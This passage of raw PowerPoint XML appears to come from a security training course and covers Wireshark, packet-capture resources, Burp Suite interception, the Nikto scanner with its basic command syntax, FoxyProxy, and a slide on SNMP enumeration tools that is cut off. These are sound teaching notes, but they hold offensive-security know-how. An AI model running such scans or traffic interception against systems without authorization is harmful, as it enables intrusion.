          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Layer Details</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="13044122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C7A17-F7FD-4ED9-B28C-0360B33418C6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{BECF63ED-5365-0347-943C-46237B9951C9}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>247</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2A4B2924-F067-41C8-BC2B-09E419359318}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>wireshark</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> continued</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3154F4A1-DB68-4250-87E8-EE9E9E4AAF8E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="426720" y="1371600"/>
            <a:ext cx="6355080" cy="4572000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>You can follow the TCP streams for nearly any packet captured to see full connections</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0EAF7CF4-7912-48AE-AF32-00F98579B306}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7086600" y="1047768"/>
            <a:ext cx="4450536" cy="4762464"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="8857692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CA83E6-B589-4F80-99BA-A3A59C0AE61B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{BECF63ED-5365-0347-943C-46237B9951C9}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>248</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0AE2539F-D898-4FF7-9062-D23B8994603F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>wireshark</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Resources</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E25DD15C-3AE3-427C-BBE6-5709CE49E2AB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0">
                <a:hlinkClick r:id="rId2">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>https://stationx-public-download.s3.us-west-2.amazonaws.com/Wireshark-Cheat-Sheet-v1.pdf</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Common filters to sort the mess</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0">
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:hlinkClick r:id="rId3">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>https://packetlife.net/media/library/12/tcpdump.pdf</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="0" dirty="0">
              <a:latin typeface="+mj-lt"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Sniff traffic on the command line with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>TCPDump</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="+mj-lt"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0">
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:hlinkClick r:id="rId4">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>https://www.netresec.com/?page=NetworkMiner</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="0" dirty="0">
              <a:latin typeface="+mj-lt"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Extract files transferred during packet capture</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0">
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:hlinkClick r:id="rId5">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>https://unit42.paloaltonetworks.com/wireshark-tutorial-decrypting-https-traffic/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="0" dirty="0">
              <a:latin typeface="+mj-lt"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Decrypt HTTPS traffic given the encryption key log file</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>Ann Challenges (uploaded to Confluence)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="6424981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53B75-31A4-48E0-9D83-A16029516C76}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{BECF63ED-5365-0347-943C-46237B9951C9}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>249</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2F258E1D-DFB0-476D-9BD8-D4F3F1DFE5FC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>burpsuite</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E9F090C1-EC00-488D-A8AD-3EC3FE7A1149}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="426720" y="1371600"/>
            <a:ext cx="4831080" cy="4572000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Covered in greater detail in the Web Application Attacks lecture</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Proxy to intercept, generate, and manipulate web traffic</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Best practice: have this running and route your browser through it even if you don’t use it</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9017D34B-E30E-4DBF-8BE3-D32444B71FC8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6248400" y="1463049"/>
            <a:ext cx="5348207" cy="3931902"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="57150">
            <a:solidFill>
              <a:schemeClr val="bg2">
                <a:lumMod val="50000"/>
                <a:lumOff val="50000"/>
              </a:schemeClr>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="205001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FBAA6-F4CB-4D14-B12E-FDAD5552AD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DAFA417-EFEA-4CEC-BBE5-683299A7EFCF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Nikto</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AF4F0DB0-FFE6-47EE-8E53-99A8E5864486}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="414338" y="1295400"/>
            <a:ext cx="11980862" cy="4876800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>More or less point-and-shoot</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Basic Syntax: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>nikto</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> -h http[s]://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>address:port</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Does some basic vulnerability scanning and checks for allowed HTTP methods</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9030903C-BDED-48F4-B4B5-286602887DE9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect r="10753" b="21142"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5431964" y="2860507"/>
            <a:ext cx="6370952" cy="3141859"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0C5F3C9B-C340-4DD5-8D3B-41A20CD7A1D9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="414338" y="4194445"/>
            <a:ext cx="6620799" cy="914528"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="38100">
            <a:solidFill>
              <a:schemeClr val="bg2"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{68FAD34D-E82A-4A40-9B34-9C3A7B4A8F18}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="389084" y="5084327"/>
            <a:ext cx="202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a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="324351116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306137-6A75-4B1B-9FAC-1573AFD234FE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{BECF63ED-5365-0347-943C-46237B9951C9}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>250</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{691779BA-3336-43B7-AD50-D1DE185D4B6C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>foxyproxy</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{609E273D-72CB-4A31-ACD4-DBB28711104F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="426720" y="1371600"/>
            <a:ext cx="11338560" cy="1066800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Firefox and Chrome extension – easier proxy switching</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Can store multiple profiles (e.g., </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Burpsuite</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Proxychains</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C678C645-464D-4605-A12B-F3FBA5F7B638}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3372903" y="2447925"/>
            <a:ext cx="5446193" cy="3609483"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="19050">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="42159548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5FD581-882E-42A9-A758-B1C0C1DD2D67}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{BECF63ED-5365-0347-943C-46237B9951C9}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>251</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{53A78011-4D4A-4C79-A6D9-DB32B0C3958C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>onesixtyone</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> / </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>snmpwalk</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E86A4D17-C24B-49B7-8908-2CA7C5653268}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="426720" y="1219200"/>
            <a:ext cx="11338560" cy="2590800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1">
